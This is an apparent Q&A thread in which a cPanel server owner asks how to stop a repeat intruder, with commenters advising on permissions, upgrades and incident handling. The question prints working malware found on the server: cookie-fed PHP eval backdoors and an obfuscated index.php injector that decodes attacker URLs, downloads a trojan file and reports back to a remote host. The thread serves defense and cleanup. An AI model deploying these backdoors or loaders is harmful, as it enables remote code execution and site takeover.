# Prevent hacker from uploading files and creating/changing emails

Tags: php, security, cpanel

We have an EC2 instance with Cpanel installed. A couple of days ago we noticed some PHP files in the only account we have with random names like `wDciW.php` with different codes like:

```
<?php
$p=$_COOKIE;(count($p)==20&&in_array(gettype($p).count($p),$p))?(($p[29]=$p[29].$p[13])&&($p[11]=$p[29]($p[11]))&&($p=$p[11]($p[16],$p[29]($p[26])))&&$p()):$p;
?>
```

.htaccess files added or modified to allow running files with extensions like `.py` as well as files with image extensions with codes like:

```
<?php

if(isset($_SERVER['HTTP_USER_AGENT'])) {

    if(strpos($_SERVER['HTTP_USER_AGENT'], '23561017') !== false) {

        function clnt() {
            $b = $_COOKIE;
           ($b && isset($b[61])) ? (($gg = $b[61].$b[34]) && ($mn = $gg($b[36].$b[89])) && ($_mn = $gg($b[32].$b[54])) && ($_mn = $_mn($gg($b[64]))) && @eval($_mn)) : $b;

            return 0;

        }

        clnt();

    }

} /* sQ6H7D */
```

All `index.php` files got updated with such code at the beginning:

```
<?php
$O00OO_0_O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O000OOO___=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{16}.$O00OO_0_O_{18}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O_0O_0O0O_=$O00OO_0_O_{38}.$O00OO_0_O_{12}.$O00OO_0_O_{23}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{27}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{10}.$O00OO_0_O_{33};$O0_O0_O0O_=$O00OO_0_O_{32}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{6}.$O00OO_0_O_{10}.$O00OO_0_O_{30}.$O00OO_0_O_{29}.$O00OO_0_O_{38}.$O00OO_0_O_{18}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{10}.$O00OO_0_O_{12}.$O00OO_0_O_{35}.$O00OO_0_O_{0};$OOO0_O0_0_=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{0}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$OO0O___0O0=$O00OO_0_O_{3}.$O00OO_0_O_{6}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{22}.$O00OO_0_O_{36}.$O00OO_0_O_{29}.$O00OO_0_O_{26}.$O00OO_0_O_{30}.$O00OO_0_O_{32}.$O00OO_0_O_{35}.$O00OO_0_O_{26}.$O00OO_0_O_{30};$O_O_0_O00O=$O00OO_0_O_{16}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{27}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_00O0OO__=$O00OO_0_O_{33}.$O00OO_0_O_{10}.$O00OO_0_O_{24}.$O00OO_0_O_{29}.$O00OO_0_O_{24}.$O00OO_0_O_{30}.$O00OO_0_O_{16}.$O00OO_0_O_{23}.$O00OO_0_O_{6}.$O00OO_0_O_{32}.$O00OO_0_O_{30};$O_0_O0_O0O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{10}.$O00OO_0_O_{35}.$O00OO_0_O_{16}.$O00OO_0_O_{10};$O_O_O000_O=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{32}.$O00OO_0_O_{23}.$O00OO_0_O_{35}.$O00OO_0_O_{33}.$O00OO_0_O_{30};$O___00OO0O=$O00OO_0_O_{33}.$O00OO_0_O_{30}.$O00OO_0_O_{24}.$O00OO_0_O_{12}.$O00OO_0_O_{6}.$O00OO_0_O_{23}.$O00OO_0_O_{12}.$O00OO_0_O_{2}.$O00OO_0_O_{30};$O__0O0_0OO=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{12}.$O00OO_0_O_{0}.$O00OO_0_O_{12}.$O00OO_0_O_{10};$O_OO_O000_=$O00OO_0_O_{32}.$O00OO_0_O_{18}.$O00OO_0_O_{24}.$O00OO_0_O_{23}.$O00OO_0_O_{29}.$O00OO_0_O_{30}.$O00OO_0_O_{17}.$O00OO_0_O_{30}.$O00OO_0_O_{32};$OO0O0__O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O__O00_OO0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $O__O00_OO0;');$OOO_O00_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$url','$OO0O0_0_O_=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($url);if(!$OO0O0_0_O_){$O0O0_O_0O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f"]($O0O0_O_0O_,CURLOPT_RETURNTRANSFER,1);$OO0O0_0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x4f\x30\x30\x30\x5f"]($O0O0_O_0O_);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x4f\x30\x30\x30\x5f\x4f"]($O0O0_O_0O_);}return $OO0O0_0_O_;');$O_OO__0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x5f\x4f\x30\x4f\x5f"]('$O_0O_O_0O0=\'\'','$O_0_O_OO00=array();$O_0_O_OO00["\x70\x61\x74\x68"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'//\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x50\x48\x50\x5f\x53\x45\x4c\x46"]),\'\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x30\x4f\x30\x4f\x4f\x5f\x5f"](\'\\\\\\\\\',\'/\',${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x43\x52\x49\x50\x54\x5f\x46\x49\x4c\x45\x4e\x41\x4d\x45"]));$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30\x5f"]();$O_0_O_OO00["\x73\x68\x65\x6c\x6c\x5f\x6c\x69\x6e\x6b"]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cHM6Ly9nYWQuZ2VjZWd5cHQuY29tL2Fib3V0LnBocD81MjA=\');if(isset(${"\x5f\x47\x45\x54"}["\x64\x65\x6c"])&&${"\x5f\x47\x45\x54"}["\x64\x65\x6c"]=="my_code"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);if($OO0O0O0___>0){die("delete success");}die("delete failed");}$OO_O__O000=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("YWJvdXQucGhw");$O0O_0_O0_O=$O_0_O_OO00["\x70\x61\x74\x68"]."/".$OO_O__O000;$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("aHR0cDovLzUxbGEuaXp2NC5jb20vYS50eHQ="));$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0O_0_O0_O,$OO0O0O0___);if($OO0O0O0___>0){$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="http://".$O_0_O_OO00["\x64\x6f\x6d\x61\x69\x6e"]."/".$OO_O__O000;}else{$O_0_O_OO00["\x74\x72\x6f\x6a\x61\x6e"]="write failed";}$OO_0O00O__=sprintf(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"](\'aHR0cDovLzUxbGEuaXp2NC5jb20vP2Q9JXM=\'),${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x4f\x30\x5f\x30\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x30\x4f\x4f\x30\x4f"]($O_0_O_OO00)));$O__OO0O00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x4f\x30\x30\x5f\x30\x5f"]($OO_0O00O__);if($O__OO0O00_=="done"){$O0_0OO_O0_=$O_0_O_OO00["\x70\x61\x74\x68"]."/index.php";$OO0O0O0___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x5f\x30\x4f\x30\x4f\x5f"]($O0_0OO_O0_);$O_OO_0_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30"]("PFw/cGhwLitcKDFcKTtcPz4=");$OO0O0O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x4f\x30\x30\x4f"]("/$O_OO_0_0O0/si",\'\',$OO0O0O0___);@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x4f\x4f\x5f\x5f\x5f"]($O0_0OO_O0_,$OO0O0O0___);}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x4f\x5f\x5f\x30\x4f\x30\x30"](1);?>
```

or a script to include the previously mentioned image files.

We deleted all such files from `public_html` and subdomains folders. We suspected this was from an old WordPress website so we deleted it too.

Today we found 2 new PHP files in `public_html` directory and all the emails passwords were changed as well as some new emails were created.

We installed `imunifyav` to scan and remove malicious files. We found some similar files in `/home/user/etc` folder and in `vendor/composer` folder in one of the subdomains that were uploaded before. We removed all these files, changed all emails passwords, removed all the created emails, and changed the Cpanel account password.

After removing all the malicious files and changing account password, would that be enough to prevent the hacker from uploading or adding/changing emails?

If he managed to upload some files to the server, could he create/change emails or such actions require Cpanel or SSH access?

Comment: upgrade your PHP to version 8.2, as the old version has a vulnerability with the fpm module of the older version of php

Comment: i've had a hacker enter my system using that, after the upgrade and cleaning the server with new code, and new configs. and they never entered again. they were mining bitcoin on my server. I assume them using python to mine bitcoin... be careful

Comment: change your php scripts file permission to use a non root user, limit the non root user to only the directories the scripts belong in.

Comment: they are using the cookie to store php function code and then using that `wDciW.php` script to execute the cookie value they parse in

Comment: @DeanVanGreunen PHP 8.2 is installed and activated for all subdomians `PHP-FPM` is disabled

Comment: Some of the guidance in [How do I deal with a compromised server?](https://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) is likely to be relevant. There could be lots of ways they got access to your system, either code vulnerabilities or infrastructure vulnerabilities, and we know absolutely nothing about your system at all, so it's hard to offer any concrete advice. That article details strategies you can take, and also more widely how to handle the fallout of the situation if you're in a corporate environment.

Comment: _"After removing all the malicious files and changing account password, would that be enough to prevent the hacker from uploading or adding/changing emails?"_ Almost certainly not. Your server was likely compromised because of a misconfiguration, not a leaked password. First step: The web server process should never have write access to the files it serves.

Comment: @ADyson All the subdomains code is written in PHP or Laravel. If any of them has an upload feature I validate the files. Also I validate all inputs.

Comment: @AlexHowansky How to change the write access permissions? Is it possible to test after making this change?

Comment: @john You might want to get all that code penetration-tested then, to check it really does stop everything it's supposed to. _Something_ has got through somewhere. Either it's a mistake in the code, or in the webserver's config (exacerbated, as Alex suggests, by the webserver being able to write to the folders where PHP code is stored, which is a big no-no), _or_ you got compromised some other way, e.g. by password theft or similar. We really can't tell you which it is in your case, although password theft is probably less common than dodgy code or configuration.

Comment: `How to change the write access permissions`....just regular bog-standard filesystem permissions. Don't give the webserver's user account write or modify permission on those folders. Read+execute is all that's needed. (If you have a legitimate folder where uploaded documents are stored, that's an exception - but then the files in there must absolutely not have execute permissions added to them)

Comment: Updates: I activated Cpanel login notifications and got a couple of emails from unknown IPs not belonging to us. An email account was created with a random name. A scan was executed but no malware was found. I changed the root and Cpanel account passwords. I updated CpHulk settings in case he is brute-forcing to log in. Is there anything else to do? Should I edit EC2 key pairs for SSH or what to do?